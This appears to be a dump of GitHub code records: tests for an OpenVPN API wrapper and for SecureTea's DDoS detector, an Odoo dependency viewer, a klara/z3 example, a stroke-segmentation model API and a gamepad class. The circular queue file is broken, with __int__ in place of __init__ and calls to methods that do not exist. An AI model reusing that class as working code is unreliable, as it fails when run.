vpn.send_sigterm()\n mock_socket_send.assert_called_once_with(\"signal SIGTERM\\n\")\n mock_socket_recv.assert_called_once()\n\n @patch(\"openvpn_api.vpn.VPN.send_command\")\n def test__get_version(self, mock_send_command):\n vpn = VPN(host=\"localhost\", port=1234)\n mock_send_command.return_value = \"\"\"\nOpenVPN Version: OpenVPN 2.4.4 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\nManagement Version: 1\nEND\n \"\"\"\n self.assertEqual(\n vpn._get_version(),\n \"OpenVPN 2.4.4 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\",\n )\n mock_send_command.assert_called_once_with(\"version\")\n mock_send_command.reset_mock()\n mock_send_command.return_value = \"\"\n with self.assertRaises(errors.ParseError) as ctx:\n vpn._get_version()\n self.assertEqual(\"Unable to get OpenVPN version, no matches found in socket response.\", str(ctx.exception))\n mock_send_command.assert_called_once_with(\"version\")\n mock_send_command.reset_mock()\n mock_send_command.return_value = \"\"\"\nManagement Version: 1\nEND\n \"\"\"\n with self.assertRaises(errors.ParseError) as ctx:\n vpn._get_version()\n self.assertEqual(\"Unable to get OpenVPN version, no matches found in socket response.\", str(ctx.exception))\n mock_send_command.assert_called_once_with(\"version\")\n mock_send_command.reset_mock()\n\n @patch(\"openvpn_api.vpn.VPN._get_version\")\n def test_release(self, mock_get_version):\n vpn = VPN(host=\"localhost\", port=1234)\n self.assertIsNone(vpn._release)\n release_string = \"OpenVPN 2.4.4 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\"\n mock_get_version.return_value = release_string\n self.assertEqual(vpn.release, release_string)\n self.assertEqual(vpn._release, release_string)\n mock_get_version.assert_called_once_with()\n mock_get_version.reset_mock()\n vpn._release = \"asd\"\n self.assertEqual(vpn.release, \"asd\")\n mock_get_version.assert_not_called()\n\n @patch(\"openvpn_api.vpn.VPN._get_version\")\n def test_version(self, mock_get_version):\n vpn = VPN(host=\"localhost\", port=1234)\n vpn._release = \"OpenVPN 2.4.4 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\"\n self.assertEqual(vpn.version, \"2.4.4\")\n vpn._release = \"OpenVPN 1.2.3 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\"\n self.assertEqual(vpn.version, \"1.2.3\")\n vpn._release = \"OpenVPN 11.22.33 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\"\n self.assertEqual(vpn.version, \"11.22.33\")\n vpn._release = None\n mock_get_version.assert_not_called() # Check mock hasn't been triggered up to this point\n mock_get_version.return_value = None\n self.assertIsNone(vpn.version)\n mock_get_version.assert_called_once()\n mock_get_version.reset_mock()\n vpn._release = \"asd\"\n with self.assertRaises(errors.ParseError) as ctx:\n vpn.version()\n self.assertEqual(\"Unable to parse version from release string.\", str(ctx.exception))\n mock_get_version.assert_not_called()\n\n @patch(\"openvpn_api.vpn.VPN.send_command\")\n @patch(\"openvpn_api.models.state.State.parse_raw\")\n def test_get_state(self, mock_parse_raw, mock_send_command):\n vpn = VPN(host=\"localhost\", port=1234)\n state = vpn.get_state()\n mock_send_command.assert_called_once_with(\"state\")\n mock_parse_raw.assert_called_once()\n self.assertIsNotNone(state)\n\n @patch(\"openvpn_api.vpn.VPN.release\", new_callable=PropertyMock)\n def test_cache(self, release_mock):\n \"\"\"Test caching VPN metadata works and clears correctly.\n \"\"\"\n vpn = VPN(host=\"localhost\", port=1234)\n vpn.cache_data()\n release_mock.assert_called_once()\n vpn._release = \"asd\"\n vpn.clear_cache()\n self.assertIsNone(vpn._release)\n\n @patch(\"openvpn_api.vpn.VPN.send_command\")\n @patch(\"openvpn_api.models.stats.ServerStats.parse_raw\")\n def test_get_stats(self, mock_parse_raw, mock_send_command):\n vpn = VPN(host=\"localhost\", port=1234)\n stats = vpn.get_stats()\n mock_send_command.assert_called_once_with(\"load-stats\")\n mock_parse_raw.assert_called_once()\n self.assertIsNotNone(stats)\n\n @patch(\"openvpn_api.vpn.VPN.send_command\")\n def test_get_status(self, mock):\n vpn = VPN(host=\"localhost\", port=1234)\n mock.return_value = \"\"\"OpenVPN CLIENT LIST\nUpdated,Thu Jul 18 20:47:42 2019\nCommon Name,Real Address,Bytes Received,Bytes Sent,Connected Since\ntestclient,1.2.3.4:12345,123456789,123456789,Tue Jun 11 21:22:02 2019\nROUTING TABLE\nVirtual Address,Common Name,Real Address,Last Ref\n10.0.0.2,testclient,1.2.3.4:12345,Wed Jun 12 21:55:04 2019\nGLOBAL STATS\nMax bcast/mcast queue length,2\nEND\n\"\"\"\n status = vpn.get_status()\n mock.assert_called_once()\n self.assertIsInstance(status, openvpn_status.models.Status)\n self.assertEqual(len(status.client_list), 1)\n self.assertEqual(list(status.client_list.keys()), [\"1.2.3.4:12345\"])\n","repo_name":"Jamie-/openvpn-api","sub_path":"tests/test_vpn_model.py","file_name":"test_vpn_model.py","file_ext":"py","file_size_in_byte":10954,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"35"} +{"seq_id":"6793759857","text":"# -*- coding: utf-8 -*-\nimport unittest\nfrom securetea.lib.ids.r2l_rules.ddos import DDoS\nimport scapy.all as scapy\nfrom securetea.logger import SecureTeaLogger\n\ntry:\n # if python 3.x.x\n from unittest.mock import patch\nexcept ImportError: # python 2.x.x\n from mock import patch\n\n\nclass TestDDoS(unittest.TestCase):\n \"\"\"\n Test class for SecureTea IDS DDoS Attack Detection.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Setup class for TestDDoS.\n \"\"\"\n # Initialize DDoS object\n self.ddos = DDoS()\n self.pkt1 = scapy.ARP(op=2)\n\n @patch(\"securetea.lib.ids.r2l_rules.ddos.time.time\")\n def test_classify_ddos(self, mock_time):\n \"\"\"\n Test classify_ddos.\n \"\"\"\n # Case 1: Classify as SISP\n mock_time.return_value = 10\n pkt = scapy.IP(src=\"192.168.0.1\") \\\n / scapy.TCP(dport=80)\n self.ddos.classify_ddos(pkt)\n l = len(self.ddos.sisp)\n self.assertEqual(l, 1)\n temp_dict = {\n \"count\": 1,\n \"ports\": [80],\n \"start_time\": 10\n }\n self.assertTrue(self.ddos.sisp.get(\"192.168.0.1\"))\n self.assertEqual(temp_dict,\n self.ddos.sisp[\"192.168.0.1\"])\n # Check if count increments by 1\n self.ddos.classify_ddos(pkt)\n self.assertEqual(self.ddos.sisp[\"192.168.0.1\"][\"count\"], 2)\n\n # Case2: Classify as SIMP\n pkt = scapy.IP(src=\"192.168.0.1\") \\\n / scapy.TCP(dport=90)\n self.ddos.classify_ddos(pkt)\n # IP entry should get deleted from SISP dict\n l = len(self.ddos.sisp)\n self.assertEqual(l, 0)\n\n l2 = len(self.ddos.simp)\n self.assertEqual(l2, 1)\n temp_dict = {\n \"count\": 3,\n \"ports\": [80, 90],\n \"start_time\": 10\n }\n self.assertTrue(self.ddos.simp.get(\"192.168.0.1\"))\n self.assertEqual(self.ddos.simp[\"192.168.0.1\"],\n temp_dict)\n\n @patch.object(SecureTeaLogger, 'log')\n @patch(\"securetea.lib.ids.r2l_rules.ddos.time.time\")\n def test_detect_misp(self, mock_time, mock_log):\n \"\"\"\n Test detect_misp.\n \"\"\"\n mock_time.return_value = 10\n\n # Create packets with different IP\n # but with same ports\n self.ddos.sisp[\"127.0.0.1\"] = {\n \"count\": 1,\n \"ports\": [80],\n \"start_time\": 10\n }\n self.ddos.sisp[\"127.0.0.2\"] = {\n \"count\": 1,\n \"ports\": [80],\n \"start_time\": 10\n }\n self.ddos.detect_misp()\n\n # Check if MISP dict got updated\n temp_dict = {\n \"count\": 2,\n \"start_time\": 10\n }\n\n self.assertTrue(self.ddos.misp.get(80))\n self.assertEqual(self.ddos.misp[80], temp_dict)\n self.assertFalse(mock_log.called)\n\n # Replicate attack by increasing\n # the count beyond threshold\n self.ddos.misp[80][\"count\"] = 20000\n self.ddos.detect_misp()\n mock_log.assert_called_with(\"Possible Multiple IP Single Port DDoS attack detected\",\n logtype=\"warning\")\n\n @patch(\"securetea.lib.ids.r2l_rules.ddos.time.time\")\n @patch.object(SecureTeaLogger, 'log')\n def test_detect_sisp(self, mock_log, mock_time):\n \"\"\"\n Test detect_sisp.\n \"\"\"\n # Case 1: Within the threshold\n self.ddos.sisp[\"192.168.0.1\"] = {\n \"count\": 1,\n \"start_time\": 10,\n \"ports\": [80]\n }\n self.assertFalse(mock_log.called)\n\n # Case 2: Replicate attack by increasing\n # the count beyond threshold\n self.ddos.sisp[\"192.168.0.1\"] = {\n \"count\": 20000,\n \"start_time\": 10,\n \"ports\": [80]\n }\n mock_time.return_value = 11\n self.ddos.detect_sisp()\n mock_log.assert_called_with(\"Possible Single IP Single Port DDoS attack\",\n logtype=\"warning\")\n\n @patch(\"securetea.lib.ids.r2l_rules.ddos.time.time\")\n @patch.object(SecureTeaLogger, 'log')\n def test_detect_simp(self, mock_log, mock_time):\n \"\"\"\n Test detect_simp.\n \"\"\"\n # Case 1: Threshold within the range\n self.ddos.simp[\"192.168.0.1\"] = {\n \"count\": 1,\n \"start_time\": 10,\n \"ports\": [80, 90]\n }\n mock_time.return_value = 11\n self.ddos.detect_simp()\n self.assertFalse(mock_log.called)\n\n # Case 2: Threshold beyond the range\n self.ddos.simp[\"192.168.0.1\"] = {\n \"count\": 20000,\n \"ports\": [80, 90],\n \"start_time\": 10\n }\n self.ddos.detect_simp()\n mock_log.assert_called_with(\"Possible Single IP Multiple Port DDoS attack\",\n logtype=\"warning\")\n\n @patch.object(SecureTeaLogger, 'log')\n def test_detect_mimp(self, mock_log):\n \"\"\"\n Test detect_mimp.\n \"\"\"\n # Replicate attack\n for _ in range(20000):\n ip = str(scapy.RandIP())\n self.ddos.simp[ip] = {\n \"count\": 1,\n \"start_time\": 10,\n \"ports\": [80, 90]\n }\n\n self.ddos.detect_mimp()\n mock_log.assert_called_with(\"Possible Multiple IP Multiple Port DDoS attack detected\",\n logtype=\"warning\")\n","repo_name":"OWASP/SecureTea-Project","sub_path":"test/test_ddos.py","file_name":"test_ddos.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":263,"dataset":"github-code","pt":"35"} +{"seq_id":"33681076538","text":"import os\nimport io\nimport sys\nimport tkinter as tk\nimport pygraphviz as pgv\nfrom functools import reduce\nfrom PIL import Image, ImageTk\n\nimport odoo\n\n# usage:\n# . venv/bin/activate\n# collect-dep.py --addons-path=...\n\nif __name__ == \"__main__\":\n args = sys.argv[1:]\n\n odoo.tools.config._parse_config(args)\n odoo.modules.initialize_sys_path()\n available_modules = set(odoo.modules.get_modules())\n required_modules = dict()\n dep_graph = {}\n for module in list(available_modules)[:]:\n if module.startswith((\"test_\", \"hw_\")):\n continue\n required_modules[module] = set(odoo.modules.load_information_from_description_file(module).get(\"depends\"))\n dep_graph[module] = dict((k, None) for k in required_modules[module])\n missing_modules = reduce(set.union, required_modules.values(), set()) - available_modules\n\n G = pgv.AGraph(dep_graph, directed=True, rankdir=\"BT\", ranksep=1.2, nodesep=0.3, ratio=\"fill\")\n G.node_attr.update(color=\"black\")\n\n for missing in missing_modules:\n n = G.get_node(missing)\n n.attr[\"color\"] = \"red\"\n n.attr[\"fontcolor\"] = \"red\"\n n.attr[\"penwidth\"] = 2.0\n def mark_predecessors(n):\n for p in G.predecessors_iter(n):\n #p.attr[\"color\"] = \"red\"\n p.attr[\"fontcolor\"] = \"red\"\n e = G.get_edge(p, n)\n e.attr[\"color\"] = \"red\"\n mark_predecessors(p)\n mark_predecessors(n)\n\n G.layout(\"dot\")\n G.unflatten()\n png = G.draw(format=\"png\")\n\n window = tk.Tk()\n frame = tk.Frame(window, bd=2)\n\n frame.grid_rowconfigure(0, weight=1)\n frame.grid_columnconfigure(0, weight=1)\n\n xsb = tk.Scrollbar(frame, orient=tk.HORIZONTAL)\n xsb.grid(row=1, column=0, sticky=tk.E+tk.W)\n\n ysb = tk.Scrollbar(frame)\n ysb.grid(row=0, column=1, sticky=tk.N+tk.S)\n\n image = Image.open(io.BytesIO(png))\n img = ImageTk.PhotoImage(image)\n\n canvas = tk.Canvas(frame, height=img.height(), width=img.width(), bd=0, xscrollcommand=xsb.set, yscrollcommand=ysb.set)\n canvas.grid(row=0, column=0, sticky=tk.N+tk.S+tk.E+tk.W)\n\n canvas.create_image(0,0,image=img, anchor=\"nw\")\n canvas.config(scrollregion=canvas.bbox(tk.ALL))\n xsb.config(command=canvas.xview)\n ysb.config(command=canvas.yview)\n\n canvas.bind('', lambda event: canvas.scan_mark(event.x, event.y))\n canvas.bind(\"\", lambda event: canvas.scan_dragto(event.x, event.y, gain=1))\n\n frame.pack()\n\n window.resizable(True, True)\n window.mainloop()\n","repo_name":"MarcoColombo71/collect-dep","sub_path":"collect-dep.py","file_name":"collect-dep.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12073387799","text":"maximum_classes_to_detect = 90\n\nmin_score_thresh = 0.0\n\ncategories_to_detect = ['car', 'motorcycle', 'airplane', 'bus', 'truck', 'traffic light', 'vehicle_registration_plate']\n\ndps = 20\n\n# Celery command\n# celery -A TVD worker -l info\n","repo_name":"Bublum/TVD","sub_path":"Dashboard/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14076065901","text":"class CircularQueue():\n\n def __int__(self, max=1000):\n self.max = max\n self.queue = [None] * self.max\n self.size = self.front = 0\n self.rear = None\n\n def is_empty(self):\n return self.size == 0\n\n def enqueue(self, data):\n if self.is_full():\n raise Exception(\"Queue is Full\")\n\n if self.rear == None:\n self.rear = 0\n else:\n self.rear = self.next_index(self.rear)\n\n self.queue[self.rear] = data\n self.size += 1\n return self.queue[self.rear]\n\n def deque(self):\n if self.is_empty():\n raise\n Exception('Queue is empty')\n self.queue[self.front] = None\n self.front = self.next_index(self.front)\n return self.queue[self.front]\n\n def display(self):\n print(self.queue)\n\nif __name__ == '__main__':\n cq = CircularQueue()\n cq.display()\n print(cq.enqueu())\n print(cq.enqueu())\n print(cq.enqueu())\n print(cq.enqueu())\n cq.display()\n print(cq.deque())\n print(cq.deque())\n cq.display()\n print(cq.enqueue())\n print(cq.enqueue())\n cq.display()","repo_name":"chemica1/traidingBot","sub_path":"circle_queue.py","file_name":"circle_queue.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2372475854","text":"import z3\nimport klara\n\n\nclass Z3Proxy(klara.InferProxy):\n def __init__(self, z3_expr):\n super(Z3Proxy, self).__init__(z3_expr)\n\n def __k_add__(self, other: klara.Const):\n \"\"\"represent __add__ dunder method\"\"\"\n left = self.value\n right = other.value\n expr = left + right\n # we'll create a new Z3Proxy, wrapping the new expression\n return klara.inference.InferenceResult.load_result(Z3Proxy(expr))\n\n def __k_eq__(self, other: klara.Const):\n left = self.value\n right = other.value\n expr = left == right\n return klara.inference.InferenceResult.load_result(Z3Proxy(expr))\n\n def __k_bool__(self):\n yield klara.inference.InferenceResult(self, status=True)\n\n\nAST2Z3TYPE_MAP = {\"int\": z3.Int, \"float\": z3.Real, \"bool\": z3.Bool, \"str\": z3.String}\n\n\n@klara.inference.inference_transform_wrapper\ndef _infer_arg(node: klara.Arg, context):\n name = node.arg\n z3_var_type = AST2Z3TYPE_MAP[str(node.annotation)]\n z3_var = z3_var_type(name)\n proxy = Z3Proxy(z3_var)\n yield klara.inference.InferenceResult.load_result(proxy)\n\n\nklara.MANAGER.register_transform(klara.Arg, _infer_arg)\n\nsource = \"\"\"\n def foo(a: int):\n return a + 2 == 12\n \"\"\"\ntree = klara.parse(source)\nfor res in tree.body[0].infer_return_value():\n z3.solve(res.result.value)\n","repo_name":"usagitoneko97/klara","sub_path":"klara/examples/infer_z3.py","file_name":"infer_z3.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":254,"dataset":"github-code","pt":"35"} +{"seq_id":"6543826577","text":"from skimage import io\nimport numpy as np\nimport os\nimport cv2\nimport tensorflow as tf\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.applications import *\nfrom tensorflow.keras.applications.xception import preprocess_input\nimport tensorflow.keras as keras\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nimport tensorflow.keras.backend as K\nimport copy\n\n\nLABEL_DICT = {'background': 0, 'normal': 1, 'stroke': 2}\nCOLOR_DICT = {'background': (0, 0, 0), 'normal': (0, 255, 0), 'stroke': (255, 0, 0)}\n\n\ndef ConvAndBatch(x, n_filters=64, kernel=(2, 2), strides=(1, 1), padding='valid', activation='relu'):\n filters = n_filters\n\n conv_ = Conv2D(filters=filters,\n kernel_size=kernel,\n strides=strides,\n padding=padding)\n\n batch_norm = BatchNormalization()\n\n activation = Activation(activation)\n\n x = conv_(x)\n x = batch_norm(x)\n x = activation(x)\n\n return x\n\n\ndef ConvAndAct(x, n_filters, kernel=(1, 1), activation='relu', pooling=False):\n poolingLayer = AveragePooling2D(pool_size=(1, 1), padding='same')\n convLayer = Conv2D(filters=n_filters,\n kernel_size=kernel,\n strides=1)\n\n activation = Activation(activation)\n\n if pooling:\n x = poolingLayer(x)\n\n x = convLayer(x)\n x = activation(x)\n\n return x\n\n\ndef AttentionRefinmentModule(inputs, n_filters):\n filters = n_filters\n\n poolingLayer = AveragePooling2D(pool_size=(1, 1), padding='same')\n\n x = poolingLayer(inputs)\n x = ConvAndBatch(x, kernel=(1, 1), n_filters=filters, activation='sigmoid')\n\n return multiply([inputs, x])\n\n\ndef FeatureFusionModule(input_f, input_s, n_filters):\n concatenate = Concatenate(axis=-1)([input_f, input_s])\n\n branch0 = ConvAndBatch(concatenate, n_filters=n_filters, kernel=(3, 3), padding='same')\n branch_1 = ConvAndAct(branch0, n_filters=n_filters, pooling=True, activation='relu')\n branch_1 = ConvAndAct(branch_1, n_filters=n_filters, pooling=False, activation='sigmoid')\n\n x = multiply([branch0, branch_1])\n return Add()([branch0, x])\n\n\ndef ContextPath(layer_13, layer_14):\n globalmax = GlobalAveragePooling2D()\n\n block1 = AttentionRefinmentModule(layer_13, n_filters=1024)\n block2 = AttentionRefinmentModule(layer_14, n_filters=2048)\n\n global_channels = globalmax(block2)\n block2_scaled = multiply([global_channels, block2])\n\n block1 = UpSampling2D(size=(4, 4), interpolation='bilinear')(block1)\n block2_scaled = UpSampling2D(size=(4, 4), interpolation='bilinear')(block2_scaled)\n\n cnc = Concatenate(axis=-1)([block1, block2_scaled])\n\n return cnc\n\n\ndef FinalModel(x, layer_13, layer_14):\n x = ConvAndBatch(x, 32, strides=2)\n x = ConvAndBatch(x, 64, strides=2)\n x = ConvAndBatch(x, 156, strides=2)\n\n # context path\n cp = ContextPath(layer_13, layer_14)\n fusion = FeatureFusionModule(cp, x, 3)\n ans = UpSampling2D(size=(8, 8), interpolation='bilinear')(fusion)\n\n return ans\n\n\ndef get_model(imageNet=False):\n inputs = Input(shape=(608, 608, 3))\n x = Lambda(lambda image: preprocess_input(image))(inputs)\n if imageNet:\n xception = Xception(weights='imagenet', input_shape=(608, 608, 3), include_top=False)\n else:\n xception = Xception(weights=None, input_shape=(608, 608, 3), include_top=False)\n\n tail_prev = xception.get_layer('block13_pool').output\n tail = xception.output\n\n output = FinalModel(x, tail_prev, tail)\n\n return inputs, xception.input, output\n\ndef readTif(tifPath, keepThreshold=100, imgShape=(608, 608), filterDark=True, returnOriginal=False):\n assert os.path.exists(tifPath)\n imgStack = io.imread(tifPath)\n (steps, height, width) = imgStack.shape\n print(\"Image Stack Size:\", imgStack.shape)\n processedStacks = []\n originalStacks = []\n for step in range(steps):\n img8 = cv2.normalize(imgStack[step], None, 0, 255, cv2.NORM_MINMAX)\n img8 = np.asarray(img8, dtype='uint8')\n blur = cv2.GaussianBlur(img8, (3, 3), 0)\n imgResize = cv2.resize(blur, imgShape)\n img3Channel = cv2.cvtColor(imgResize, cv2.COLOR_GRAY2RGB)\n if filterDark:\n if np.max(imgResize) >= keepThreshold:\n processedStacks.append(img3Channel)\n else:\n processedStacks.append(img3Channel)\n if returnOriginal:\n imgOrignal = cv2.normalize(imgStack[step], None, 0, 255, cv2.NORM_MINMAX)\n imgOrignal = np.asarray(imgOrignal, dtype='uint8')\n originalStacks.append(imgOrignal)\n\n if returnOriginal:\n return processedStacks, originalStacks\n else:\n return processedStacks\n\ndef predict2Mask(prediction):\n copyMask = np.zeros(shape=(prediction.shape[0], prediction.shape[1], 3), dtype='uint8')\n binarayMask = np.argmax(prediction, axis=-1)\n for key in LABEL_DICT.keys():\n label = np.zeros(shape=(len(LABEL_DICT.keys()), ), dtype='uint8')\n label[LABEL_DICT[key]] = 1\n copyMask[binarayMask == LABEL_DICT[key], :] = label\n return copyMask\n\ndef label2Color(labelMask):\n copyMask = copy.deepcopy(labelMask)\n canvas = np.zeros(shape=(copyMask.shape[0], copyMask.shape[1], 3), dtype='uint8')\n for key in LABEL_DICT.keys():\n canvas[copyMask[:, :, LABEL_DICT[key]] == 1, :] = COLOR_DICT[key]\n return canvas\n\ndef softmax(X, theta = 1.0, axis = None):\n \"\"\"\n Compute the softmax of each element along an axis of X.\n\n Parameters\n ----------\n X: ND-Array. Probably should be floats.\n theta (optional): float parameter, used as a multiplier\n prior to exponentiation. Default = 1.0\n axis (optional): axis to compute values along. Default is the\n first non-singleton axis.\n\n Returns an array the same size as X. The result will sum to 1\n along the specified axis.\n \"\"\"\n\n # make X at least 2d\n y = np.atleast_2d(X)\n\n # find axis\n if axis is None:\n axis = next(j[0] for j in enumerate(y.shape) if j[1] > 1)\n\n # multiply y against the theta parameter,\n y = y * float(theta)\n\n # subtract the max for numerical stability\n y = y - np.expand_dims(np.max(y, axis = axis), axis)\n\n # exponentiate y\n y = np.exp(y)\n\n # take the sum along the specified axis\n ax_sum = np.expand_dims(np.sum(y, axis = axis), axis)\n\n # finally: divide elementwise\n p = y / ax_sum\n\n # flatten if X was 1D\n if len(X.shape) == 1: p = p.flatten()\n\n return p\n\nclass STROKE_MASK:\n def __init__(self, weights_folder):\n \"\"\"\n :param weights_folder: The path to the folder containing: \"checkpoint\", \"model.tf.index\"....\n \"\"\"\n inputs, xception_inputs, ans = get_model()\n self.model = Model(inputs=[inputs, xception_inputs], outputs=[ans])\n self.model_weights = os.path.join(weights_folder,\n [item for item in os.listdir(weights_folder) if \".index\" in item][0].replace(\n \".index\", \"\"))\n self.model.load_weights(self.model_weights)\n\n def visualize(self):\n \"\"\"\n Visualizing the model structure\n :return: None\n \"\"\"\n self.model.summary()\n\n def predict(self, tif_stack_list, heatmap=False, color=False):\n \"\"\"\n :param tif_stack_list: A list of numpy arrays, each array is a stack.\n :param heatmap: if true, Return the original predictions, has the same shape as input.\n axis 0 => background, 1 => Normal, 2 => Stroke\n The number in each axis indicates the confidence value.\n [\n (steps, height, width, 3),\n (steps, height, width, 3),\n ...\n ]\n If False, Return the one-hot label of predictions.\n [\n (steps, height, width, 3), [1, 0, 0] => background, [0, 1, 0] => Normal, [0, 0, 1] => Stroke\n (steps, height, width, 3),\n ...\n ]\n :param color: Covert one-hot predictions to color mask.\n :return: A list of predictions\n \"\"\"\n imgShape = (608, 608)\n result = []\n for tif_stack in tif_stack_list:\n assert len(tif_stack.shape) >= 3\n steps= tif_stack.shape[0]\n processedStack = []\n for step in range(steps):\n img8 = cv2.normalize(tif_stack[step], None, 0, 255, cv2.NORM_MINMAX)\n img8 = np.asarray(img8, dtype='uint8')\n blur = cv2.GaussianBlur(img8, (3, 3), 0)\n imgResize = cv2.resize(blur, imgShape)\n if len(imgResize.shape) == 3:\n img3Channel = imgResize\n else:\n img3Channel = cv2.cvtColor(imgResize, cv2.COLOR_GRAY2RGB)\n\n processedStack.append(img3Channel)\n processedStack = np.asarray(processedStack, dtype=np.float32)\n x = [processedStack, processedStack]\n predictions = self.model.predict(x, batch_size=4, verbose=1)\n\n if heatmap:\n result.append(softmax(predictions, axis=-1))\n else:\n tmp_result = []\n for i in range(steps):\n if color:\n tmp_result.append(label2Color(predict2Mask(predictions[i])))\n else:\n tmp_result.append(predict2Mask(predictions[i]))\n tmp_result = np.array(tmp_result)\n result.append(tmp_result)\n\n return result\n\ndef test():\n S = STROKE_MASK(r\"C:\\Projects\\lightsheetDL\\weights\")\n S.visualize()\n\n test_stacks = [\n np.array(readTif(r\"C:\\Projects\\lightsheetDL\\dataset\\raw\\mouse1_july30_crop.tif\", imgShape=(1216, 1216)))]\n result = S.predict(test_stacks, color=True)\n print(result[0].shape)\n for i in range(result[0].shape[0]):\n cv2.imshow('1', result[0][i])\n cv2.waitKey(1)\n\n result = S.predict(test_stacks, heatmap=True)\n print(result[0].shape)\n\n # result = S.predict(test_stacks, heatmap=False)\n # print(result[0].shape)\n\nif __name__ == '__main__':\n S = STROKE_MASK(r\"C:\\Projects\\lightsheetDL\\weights\")\n S.visualize()\n\n test_stacks = [\n np.array(readTif(r\"C:\\Projects\\lightsheetDL\\dataset\\raw\\mouse1_july30_crop.tif\", imgShape=(1216, 1216)))]\n # result = S.predict(test_stacks, color=True)\n # print(result[0].shape)\n # for i in range(result[0].shape[0]):\n # cv2.imshow('1', result[0][i])\n # cv2.waitKey(1)\n\n result = S.predict(test_stacks, heatmap=True)\n print(result[0].shape)\n\n","repo_name":"JulianPitney/Glycine_Transporter-1_Antagonist_Provides_Neuroprotection_in_Vivo_Lightsheet_Analysis","sub_path":"Step2_GenStrokeMask/src/strokeMaskAPI.py","file_name":"strokeMaskAPI.py","file_ext":"py","file_size_in_byte":10790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"9778758708","text":"import time\nimport sys\nimport pygame\n\n\nclass Gamepad():\n\n def __init__(self, id):\n self.buttonFunctions = dict() # Dict which connects buttons to functions\n self.controller = None\n self.deadzone = 0.2\n pygame.init() # Scans system for joysticks, listens to events\n print(\"Number of joysticks found: \" + str(pygame.joystick.get_count()))\n if (pygame.joystick.get_count() > id):\n self.controller = pygame.joystick.Joystick(id)\n print(\"Connected to \" + self.controller.get_name())\n self.controller.init()\n print(\"Number of axes: \" + str(self.controller.get_numaxes())\n + \". Number of buttons: \" + str(self.controller.get_numbuttons()))\n else:\n print(\"Given joystick id not found.\")\n\n def update(self):\n self.checkPressedButtons()\n\n def enabled(self):\n ''' Returns true if controller is found. False otherwise. '''\n return self.controller != None\n\n def getYPR(self):\n yaw = self.apply_deadzone(self.getAxis(3)) # 3 = Right stick (left -1, right 1)\n pitch = self.apply_deadzone(self.getAxis(1)) # 1 = Left stick (up -1, down 1)\n roll = self.apply_deadzone(self.getAxis(0)) # 0 = Left stick (left -1, right 1)\n return yaw, pitch, roll\n\n\n def getThrottle(self):\n '''\n Scales throttle to a range of [0,1].\n Also applies a deadzone\n '''\n d = self.deadzone\n throttle = self.getAxis(2) + self.getAxis(5)\n throttle += 2 # Range [0,4]\n throttle += -d\n throttle = max(0, throttle)\n throttle /= (4 - d) # Range [0,1]\n return throttle\n\n def apply_deadzone(self, value):\n '''\n Applies deadzone and scales the value back to range of [0,1]\n '''\n d = self.deadzone\n if (abs(value) < d):\n return 0\n elif (value > 0): #positive\n value = (value - d) / (1.0 - d) # scales it back to [0,1]\n else: #negative\n value = (value + d) / (1.0 - d) # scales it back to [0,1]\n return value\n\n def printAllAxis(self):\n # 0 = Left stick (left -1, right 1)\n # 1 = Left stick (up -1, down 1)\n # 2 = Left trigger [-1,1]\n # 3 = Right stick (left -1, right 1)\n # 4 = Right stick (up -1, down 1)\n # 5 = Right trigger [-1,1]\n # Buttons:\n # 0 = A\n # 1 = B\n # 2 = X\n # 3 = Y\n # 4 = Left shoulder\n # 5 = Right shoulder\n # 6 = back\n # 7 = start\n # 8 = xbox\n # 9 = Left stick\n # 10 = Right stick\n for i in range(self.controller.get_numaxes()):\n print(i, \"=\", self.controller.get_axis(i), end=' ')\n print(\"\")\n\n def getAxis(self, number):\n \"\"\"Returns the current value of given axis\"\"\"\n if (not self.controller):\n print('no controller')\n return\n if (self.controller.get_numaxes() <= number):\n print(\"Warning: ControllerInput: Joystick axis\", number, \"not found.\")\n return 0\n return self.controller.get_axis(number)\n\n def connectButton(self, number, function):\n \"\"\"Connects a joystick button to given function.\n\n NOTE: The connected functions will only be called if checkPressedButtons\n is called. Therefore you have to periodically call checkPressedButtons.\n \"\"\"\n if (not self.controller):\n return\n if (self.controller.get_numbuttons() < number):\n print(\"Warning: ControllerInput: Attempted to connect to invalid button.\")\n if (number in self.buttonFunctions.keys()):\n print(\"Warning: ControllerInput: Overriding previously connected function.\")\n self.buttonFunctions[number] = function\n\n def checkPressedButtons(self):\n \"\"\"Checks for pressed buttons and calls their corresponding functions,\n if a function has been connected to the button.\n \"\"\"\n for event in pygame.event.get():\n if event.type == pygame.JOYBUTTONDOWN:\n #print(\"Pressed:\" + str(event.button))\n if (event.button in self.buttonFunctions.keys()):\n self.buttonFunctions[event.button]()\n\n def close(self):\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n 